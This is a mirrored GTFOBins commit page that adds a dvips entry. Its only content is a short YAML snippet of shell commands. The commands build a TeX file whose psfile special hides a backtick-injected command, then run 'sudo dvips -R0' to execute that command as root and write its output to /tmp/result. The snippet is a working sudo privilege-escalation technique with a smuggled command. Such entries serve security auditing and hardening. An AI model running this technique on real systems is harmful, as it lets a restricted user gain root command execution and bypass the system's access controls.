mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
85010470b2
Add dvips.
355 B
355 B
functions: sudo: - code: | echo "\documentclass[12pt]{article} \begin{document}" > file.tex echo '$$\hbox to5cm{\vbox to5cm{\vfil\special{psfile="`PROGRAM > /tmp/result"}}\hfill}$$' >> file.tex echo "\end{document}" >> file.tex tex -interaction=nonstopmode file.tex && sudo dvips -R0 file.dvi cat /tmp/result